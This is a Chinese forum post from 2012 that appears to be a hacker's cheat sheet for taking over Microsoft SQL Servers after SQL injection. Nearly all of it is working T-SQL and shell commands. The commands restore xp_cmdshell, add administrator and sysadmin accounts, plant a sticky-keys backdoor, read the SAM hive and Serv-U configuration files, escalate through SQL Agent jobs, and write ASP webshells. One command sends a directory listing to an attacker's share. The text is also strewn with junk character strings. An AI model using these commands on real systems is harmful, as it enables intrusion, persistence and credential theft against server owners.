1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号$ |4 r5 m7 \& S3 q
恢复方法:查询分离器连接后,
+ j8 m6 b5 n( T: S, n第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 9 a `; Y) C$ ?8 w9 _- v& V% x
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 q* Z9 m& a5 v; ]- P4 e然后按F5键命令执行完毕) r8 s0 L T5 a9 {" L. H4 @5 r0 ?
; X6 u; c9 c* _! p: B8 r
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
6 |/ s2 G! i R* E0 l k: y% H恢复方法:查询分离器连接后," L2 X/ M9 h( x& B% C
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"1 B* j1 |/ o: Q L4 @1 s+ z
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'9 t B% Z) h% y, t
然后按F5键命令执行完毕
3 l+ X8 U0 q3 d3 T
% F( |3 | e. H5 A p3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。). e* }. X: v1 c, g
恢复方法:查询分离器连接后,# N- K9 s. n$ N, R- n, J# m" B
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
/ J- f5 W6 a. I5 V# e" `4 R# A( j第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
9 ~% _9 b4 P2 e! M9 g+ L7 d然后按F5键命令执行完毕
- w; w2 p. H- ?0 S+ N3 N5 O+ ?; S5 Q2 r# X9 U6 b! n7 o
4 终极方法.4 \0 y( F& o$ }1 R9 J
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:, h1 G( f4 [% J B
查询分离器连接后,
8 z% \. ^$ y! m% o1 P$ G2000servser系统:
( n5 S; R: r9 |+ b. bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
% j" r9 y2 T/ |% x- S+ j( |4 ?# \/ q. @, d+ V8 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
- l2 c2 A1 F$ o" [
9 n# H* V! E9 W mxp或2003server系统:( L ]2 ?9 M, x, t
; L* M5 R; j- h3 W( v0 E' ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'9 Y( p0 [) J: _1 u7 ^; L
# f* L- e: ^& b, Q3 f e" ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'# u5 X( a$ d) v6 A& {; Q( g
* U) ~+ W( T; J
% I3 j! M2 X: |0 n5 w
五个SHIFT! j: V+ [- [' t% V; y
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';: w' O# x8 J' f8 ~0 O! |0 l5 l
# r8 ?& P2 o# f4 pdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
$ l5 `0 Z9 L+ o6 i# G6 d( p. T6 R) f3 }1 o' p4 h
xp_cmdshell执行命令另一种方法4 X2 m4 q' G7 Q6 N
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
+ ]" S' w% i" P. k) B7 W! K$ g# W! q* L1 F- ^- O% {, a
判断存储扩展是否存在
8 ?. s" u$ Z5 {& B5 ISelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'+ x2 d3 T8 t# |$ f
返回结果为1就OK6 ^( Z) h8 Y v" ?
. t7 X' q! _3 [) V a4 p7 _, }; G( Z, _7 ?( A
上传xplog70.dll恢复xp_cmdshell语句:& n9 e$ o1 A5 k6 Z2 I4 s: i
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'8 f$ D& f' U$ N) L0 j' p: Q
/ Z' I, B: T4 v2 m4 c' a
否则上传xplog7.0.dll2 }4 V$ A# X, y. `+ [4 c
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
# n- X2 r% F; Y% @5 T7 A' K/ R: ?1 |, a3 `/ E+ @6 G7 M
# L+ F0 N* p8 ~% J
r( ~( O6 h. V5 C) g5 d首先开启沙盘模式:
" |7 L- V( V& F+ X8 texec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',18 l$ o6 U* p& c% g! p
2 Z& a* t- F2 B+ |4 o; x/ S然后利用jet.oledb执行系统命令
8 K% g7 B% _8 i1 X4 V: C1 a: Kselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
/ U. s8 N' x6 I* I返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
: H' x. v: Z& M5 q# G6 T/ O. v* U5 K+ o9 T d; u5 j, O
4 _/ h: E$ T+ W( C% G) T
. `8 M$ U: E" m4 F恢复过程sp_addextendedproc 如下:
8 g) V! v$ L3 A; U6 Wcreate procedure sp_addextendedproc --- 1996/08/30 20:13
5 _/ _/ K( E5 @( R1 Z@functname nvarchar(517),/* (owner.)name of function to call */ 7 _3 J1 [- w3 m5 y' Y' F
@dllname varchar(255)/* name of DLL containing function */
3 K: `+ e6 R- \5 }as
, h# U b* R" f" D+ x+ s/ nset implicit_transactions off ! \& T; X0 m* {2 p' m6 y7 m) q6 {8 b
if @@trancount > 0
( M) i6 P6 s7 j' M bbegin 4 o, |0 w! E- ]+ i$ `2 V
raiserror(15002,-1,-1,'sp_addextendedproc')
4 k8 H; x3 p) C/ p1 rreturn (1) + R' i/ F/ j! r3 L" d' K. @, \
end : a4 E* i5 j& P& \; A: e6 F8 X
dbcc addextendedproc( @functname, @dllname) # V! N& i- n8 y' h3 _
return (0) -- sp_addextendedproc 9 y e4 f9 V. u U# ]. Y' C& p9 ^/ N
GO
- z* W/ Q2 _& l K6 j, r, t1 j* f& n8 g3 A" G
. ]/ q; H+ ~" P* S
8 M0 X% B5 M' \% k7 D- m/ d0 @导出管理员密码文件9 x5 b/ ^9 @3 L* t; n. F
sa默认可以读sam键.应该。
, t7 r! e% ^5 Y" r# Greg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
6 W/ v9 B( Q# P3 S0 T- ~8 p' a6 vnet user administrator test
' T* R$ b/ j8 u/ `用administrator登陆.
" P: u8 L! _; s2 {$ o用完机器后! S, Q5 {. l0 m3 w% u. W" I$ c% A
reg import c:\test.reg
2 J( I) }( l" [根本不用克隆.
4 L* Y8 D4 H) ~2 k6 J找到对应的sid. 8 A7 N7 e5 O* J: ^0 S, C+ R. B \
& _* B' U9 e$ W
, H% m( }/ K) t3 d0 T9 d1 Z$ {" [2 Y: ~# d2 N( f
恢复所有存储过程: K" Z5 S# E+ Y4 V, {9 C2 x0 i- R
use master " y% k3 p0 q+ k: n2 C
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
}2 Q' s; e3 L/ e3 d& o6 kexec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
+ w% ~' X+ \0 `2 q& B6 v" w. aexec sp_addextendedproc xp_loginconfig,'xplog70.dll'
# E( m- A! F+ e2 t( b% u: eexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
2 T5 |0 W- B0 X) ?/ y0 h; ~, Oexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' ( m2 C6 u: w/ V/ J8 I' J) H
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
k. v+ B* ?! p. {exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
, E3 _3 t8 j4 T3 D! vexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
9 O) }( j& x( a3 W" Z* [- rexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' 5 q8 W3 r+ F0 M7 ]( u
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' ! p3 d( ]/ \* j! {5 l6 }
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
0 K! N! y Z; vexec sp_addextendedproc sp_OAStop,'odsole70.dll'
+ V) o# {# c1 z5 U, L! b( \; t# {exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
# f0 D9 u2 e- F5 Y: ~8 x9 S- S3 I" pexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
" w2 i+ T6 a3 U, m8 Aexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
: ]. @7 {5 ?7 ~/ t n5 N4 A4 jexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' $ P8 A: P" \* v1 y6 _
exec sp_addextendedproc xp_regread,'xpstar.dll' 4 @$ e, ?1 L0 T6 s( o5 u- D- `
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' ; |5 a( u2 v, P6 `
exec sp_addextendedproc xp_regwrite,'xpstar.dll' 6 w% N9 g' W. n: h; N0 R$ g
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'8 u" ~' v0 v3 H+ j& j% B
1 P3 H7 D) z" W# k% T+ \
; q+ [: \9 f8 r9 `
建立读文件的存储过程3 S8 Q- m: o# E5 c$ K" Z
Create proc sp_readTextFile @filename sysname
* u, Y6 U' \; _& \; bas
% I1 ^ \8 ?$ g1 J/ e6 d9 l, j1 b9 J( s9 p1 E) B+ }' E
begin
' g# w6 f4 C M set nocount on 3 c$ ^, T5 ?3 B7 v0 N
Create table #tempfile (line varchar(8000))
+ j# X2 `; t2 P exec ('bulk insert #tempfile from "' + @filename + '"')7 X" f, ]% R; }) {% q. j; t
select * from #tempfile
+ Y9 w/ A) U4 H6 J. \# E1 r drop table #tempfile6 X S! G! U% w2 U
End
7 F# C" d: U& v# _' Z! ?3 Q- ?# x- U2 j: H0 ^% j+ {& Y
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件9 E# z" ^; f0 N/ ]' u3 f
查看登录用户! |" P4 f! ^) B6 k3 l3 n' p
Select * from sysxlogins
: I9 W+ E0 F- H4 K
* M& Y; M# [" R% Y! l5 K2 v5 W把文件内容读取到表中/ q6 w6 a8 L$ H: b" G8 s- A
BULK INSERT tmp from "c:\test.txt"
9 u) N$ X, g9 v# ]) ndElete from 表名 清理表里的内容
6 ]9 N+ ?, ]5 B7 b% ccreate table b_test(fn nvarchar(4000));建一个表,字段为fn+ o G/ w7 B7 ]/ n
1 }7 m! [; q1 d H) U1 q# p
1 `* a d: g: x* A) A" y; v2 u: X加sa用户
7 I" v7 O# L) O3 H. S+ H! Bexec master.dbo.sp_addlogin user,pass;
' `) [% L* y* Lexec master.dbo.sp_addsrvrolemember user,sysadmin
9 t" l+ g; V+ k( E, Z
# t8 S& c$ } F0 `& h$ B' I/ ^2 O, t/ ^- x( g; F. O; `+ p
3 a4 `* O# J$ o6 F' s
读文件代码
4 z- ^* E) k- H- ~) g! pdeclare @o int, @f int, @t int, @ret int
+ l1 j) i0 l pdeclare @line varchar(8000)
& ` u$ f% J6 J' V& t8 M% q8 oexec sp_oacreate 'scripting.filesystemobject', @o out
6 V& m) x6 H! d! ?) }0 Qexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
8 v# D& B- D. r6 hexec @ret = sp_oamethod @f, 'readline', @line out
n7 q# g9 Y" E2 t. [7 Ywhile( @ret = 0 )
3 y7 g/ D. o' T9 Z( ebegin% ~ w1 w4 k1 |
print @line
" X6 t ^! ~" ~( f. p/ R2 P5 pexec @ret = sp_oamethod @f, 'readline', @line out
7 K$ D; [/ P0 g! D- G) ]9 J2 R$ Hend
, C* j! ^6 K4 |: y
) |# _. p( Q4 a& R+ X. F8 W2 Y9 T
' t2 C) e# c X M+ {写文件代码:' w+ g8 {( m( e+ ^# z+ o$ y
declare @o int, @f int, @t int, @ret int3 Y7 ]9 b, Y$ u- V# W: E
exec sp_oacreate 'scripting.filesystemobject', @o out
1 A7 I" h* Z* d0 c+ texec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
L# S2 p6 v+ M; P! Oexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
% k# ~4 U6 m# x
3 X% s4 O. e* b( ~
& p" F4 U# y" Z' r- \' S* v添加lake2 shell
* E$ V8 w: y2 _3 d, `6 l( Xsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
4 n9 f/ t0 L8 a; I- v$ |sp_dropextendedproc xp_lake2& S- |- A% q6 x5 [
EXEC xp_lake2 'net user'
! v7 ?- h5 \8 O8 x6 J9 O& s; {
( j% x) h6 Z* |& T, \4 q" L! v$ g1 K% |. ]3 b r
得到硬盘文件信息
, p8 r5 Z- s* t% S--参数说明:目录名,目录深度,是否显示文件 ; A9 D6 m- A% ]9 Q7 O& _ s5 e4 \
execute master..xp_dirtree 'c:'
8 x! [0 M, ~7 `2 E2 sexecute master..xp_dirtree 'c:',1 ' g3 t2 ]- w. M1 l; P
execute master..xp_dirtree 'c:',1,1
# ?3 l* r8 ?$ h1 s- N* e! O
" x9 g: ], N, w( C! P
& \0 |! n2 V, |0 h9 n* T读serv-u配置信息
+ {5 A1 m+ D5 V' m9 y$ y3 o: U+ Xexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'; D. C% i# w# H4 x! {
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
. d: @& o" y4 [: |* ~; p$ s9 s# B q% f$ o& ]5 C
通过xp_regwrite写SHIFT后门
2 y _+ M. i" {exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
2 m/ R2 O( H) E9 k+ S- H0 c5 _9 f! J; T2 ^) n
4 l' M% Z0 l6 t, ?9 `
' z6 H, T! R4 ?- i- t: {* C0 a
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';/ f: w4 p' N5 Q8 g
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了5 G1 _1 p8 q% q. i
6 p# ?* s5 G9 i' IEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
/ ]5 w% I% q) R( r- X/ R, ?6 F- W7 {! j
: [6 N# n9 v: [6 c' b9 X: D8 B& \2 F2 p7 I! K
sql server 2005下开启xp_cmdshell的办法( C9 L9 g1 b$ A* j6 C% c5 T7 h
+ t1 e+ P! `- X" wEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;- g* l# j4 @; n0 D
$ L' s! L( B/ ~8 q" DSQL2005开启'OPENROWSET'支持的方法:
3 \# M$ ~8 m+ A6 P
& U4 s; X8 ~6 x9 p9 W+ k( E# k* ~ mexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;5 y' S: r5 H) i/ L: u
& H) R4 ?/ h9 l5 q% `! k! B: z, b
SQL2005开启'sp_oacreate'支持的方法:: \: R" n" A9 w( F" b0 f9 [
8 k+ ?/ j$ T- {( Uexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
/ K& g$ s* Y& G7 ^8 k( G0 A1 F* s4 q% W
0 t- x/ z+ r) U6 r1 Y6 N3 v) l* Q
, j, `0 b5 W- q4 G5 b! p& W5 I! q1 J& Y: J2 r
% g, D# h" a+ r, e
% C6 i0 C7 S; h2 i) T8 ?
5 Z& Q5 {0 j% r: L5 i( n! i9 D
- Y1 A* c! y- t. Y+ B. B; `8 z' q' x% S9 \/ p- S& y1 h
9 ~# F+ Y/ t' k; P& ?) j
! [* F2 P! e3 F& q+ y
- u" [1 k) e5 j D0 Q) L3 Y
* e4 p% f, }' h6 V; N: e9 L
3 p q! P: N4 b0 {/ _( m
9 b8 a F5 K4 W9 [6 C3 `; z' w7 F X: d6 W2 C! i; q
( t" k6 n; a6 @5 l+ X& }
( [4 b+ W. z. p# F( C# k
# R% C2 o! V# m( E1 x( C" a+ k$ X7 a2 T( K5 x* y
5 c% K; k1 H+ u' z1 F- }4 H M0 v, Y) h& L; J0 V
. _) `; Z9 ?- @1 Y以下方面不知道能不能成功暂且留下研究哈:% E- A% Y& |- ]6 q7 U
4)
0 T# y+ ~: @; \2 Z5 h7 ]2 puse msdb; --这儿不要是master哟+ ]% O% ]0 b/ `; O! W
exec sp_add_job @job_name= czy82 ;
% H" p" ^" ] J, }exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;) }; @$ T4 r. H8 U0 {
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
& G" |7 V) K; q0 L; `* xexec sp_start_job @job_name= czy82 ;6 |, K1 t* [. b2 o7 v
9 @9 g8 C; G0 v2 D7 R% o, R( w利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
. n, Q# M) Q/ n& G. \" v' ?执行tsql语句了./ H6 T; H- u# v, E
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
+ F% \! R t# i- `第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)3 `0 L! X1 P; b2 o: [2 b. I; k
net start SQLSERVERAGENT
) ?/ l7 G1 ~' V7 D* Y* Y
. |+ A i8 Z4 u J8 V% L对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
- F/ `5 O- f5 Z7 C1 l3 ~USE msdb' J" I9 m4 d; ~! V5 V+ p" ?- g
EXEC sp_add_job @job_name = GetSystemOnSQL ,0 M) ]; V+ g/ h
@enabled = 1,
. U0 ?% Q' G. R( `+ ^1 t# s* t@description = This will give a low privileged user access to' v- o- w o9 I
xp_cmdshell ,
1 a$ G4 I( ^. l" t! D2 W@delete_level = 1
6 K. v$ k+ v* l2 L2 e1 aEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
: T" D" b0 Y: _( M@step_name = Exec my sql ,
' u# Z( `8 n" S" A* h* l( @4 D@subsystem = TSQL ,
3 K4 _1 j" b) c2 Q: V& K( D@command = exec master..xp_execresultset N select exec1 f& ?3 U+ G& \9 S- G1 {
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
1 X3 u- o% y3 C; x& L4 A1 E$ A& \EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
$ \5 _. D9 Q# x& \8 m+ o@server_name = 你的SQL的服务器名
1 _' x V# ^% @8 M6 {EXEC sp_start_job @job_name = GetSystemOnSQL : V3 c. Z3 v4 f0 }; U9 ` }
" [9 F9 I0 T# b P' w8 v
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
" ?4 o- j% r; B: `才让我们可以以public执行xp_cmdshell; S4 E2 ]1 f4 A, s. N# k
' |! t7 p5 }) {' @+ W0 s; ~
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)8 i4 R- P# A) Y% V
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968) T" B# o- y- g$ V: s1 P& y
7 ?, B3 d0 W4 xUSE msdb3 c' N$ P: n* T4 x3 W
EXEC sp_add_job @job_name = ArbitraryFilecreate ," @& g) K- a" `0 ?- _
@enabled = 1,
1 g# `, N8 G+ k4 Q, e% N- p@description = This will create a file called c:\sqlafc123.txt ,
- ]4 r) p- r0 s2 `% E@delete_level = 11 ^8 U" Q+ s+ Z3 L& Z; f
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
- y6 d1 ^; \- o@step_name = SQLAFC ,
3 l& H' u- Y& t7 |$ X& s@subsystem = TSQL ,+ R r4 x3 r: B2 n
@command = select hello, this file was created by the SQL Agent. ,: w* X" @+ k* _
@output_file_name = c:\sqlafc123.txt
7 w# @9 B4 w9 o* w$ q# UEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
( D4 X* ?3 ~# j( H6 ~@server_name = SERVER_NAME
- H, C" t) V! eEXEC sp_start_job @job_name = ArbitraryFilecreate
& t) U* k S0 x1 e
( W$ v/ G5 N: D' G9 ]0 p如果subsystem选的是:tsql,在生成的文件的头部有如下内容5 f- [8 b# `) Z: r, C! L
# S: R- i* s+ _. |??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19# i }9 _4 g& l) [. G6 ~( l! ?
----------------------------------------------. [5 a/ H l' f% G
hello, this file was created by the SQL Agent.- t7 F( b: r6 p2 j6 g
# a: |: i- D6 [" Y8 {4 H8 V
(1 ?????)* V/ a2 `( @" R. B1 }/ X* Z
- v- |& e7 b( \, k m6 _所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员8 _, i0 v' T3 P" V
命令的vbs文件到启动目录! ?4 N1 p G8 w* ?8 p' W! k" Z
+ e' p2 ^# L! |* ?% J
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
* U. b: [ R9 k# N% S2 l关于sp_MScopyscriptfile 看下面的例子4 Q, c4 t& `$ b, [: b0 D
declare @command varchar(100)
3 A# o' }4 q- j1 udeclare @scripfile varchar(200)
0 e6 |3 f* d; b0 b+ Xset concat_null_yields_null off ! c8 Q# h) W3 R' N
select @command= dir c:\ > "\\attackerip\share\dir.txt" 4 C3 h) `# Q/ K, m2 p! _ `
select @scripfile= c:\autoexec.bat > nul" | @command | rd " : w' m+ h# E0 u; j( g* K, n9 }) B
exec sp_MScopyscriptfile @scripfile , 9 h7 H* u1 a, [5 c3 w: |3 r6 r5 T
& x0 i) [2 v6 k1 R, p( ?' ^. y1 `8 e* O这两个东东都还在测试试哟
/ l: d5 j; Y/ o9 E/ g4 q6 C让MSSQL的public用户得到一个本机的web shell & x* K6 t. \% e3 q2 t1 j
# i2 w2 J/ u2 k7 r% P. Zsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
- ^) a1 {6 v. E c--@query= select <img src=vbscript:msgbox(now())>
* {* P8 U) y M% X( u--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
% Y* ]/ v' t/ _6 e3 F@query= select Y0 s2 q* R) k) M
<%On Error Resume Next
9 t5 P4 x4 ^, O Q! {Set oscript = Server.createObject("wscript.SHELL") q$ Q2 |2 G6 x' f' f
Set oscriptNet = Server.createObject("wscript.NETWORK") 2 J+ r7 K1 }9 B" Y
Set oFileSys = Server.createObject("scripting.FileSystemObject")
4 q# J; Z8 j7 m0 r! PszCMD = Request.Form(".CMD")
6 Y" K- w) Z0 @5 sIf (szCMD <>"")Then
. D8 |' t( m0 W9 `- vszTempFile = "C:\" & oFileSys.GetTempName()
. J: C; o. @) H5 K9 `, gCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) . T! ?1 [- w& B* |) y
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
: K% i3 _# H5 ]% o# [5 I4 k% QEnd If %>
. L4 @7 h# B: }" H" D" {2 X+ s9 L<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> 9 O& A+ P3 e/ h; g
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> ( c1 y9 q0 ~6 t `6 X
</FORM><RE> , ]( ^1 g% l, g- r2 P) I
<% If (IsObject(oFile))Then
" w, t$ V& F) d: k! r4 dOn Error Resume Next 1 r$ ]% Q! d2 b: m/ k4 S
Response.Write Server.HTMLEncode(oFile.ReadAll) ' q; i& ]- G) O3 y
oFile.Close
3 O& P) k, w/ n3 v+ n4 t. R8 lCall oFileSys.deleteFile(szTempFile, True) 0 F+ k# i. R$ \& I+ k8 U5 @
End If%>
5 ^+ t0 y+ `* s5 J+ h/ y</BODY></HTML>
# F! w8 U! X9 J/ ^* u |
发表于 2012-9-15 14:37:30
收藏
支持
反对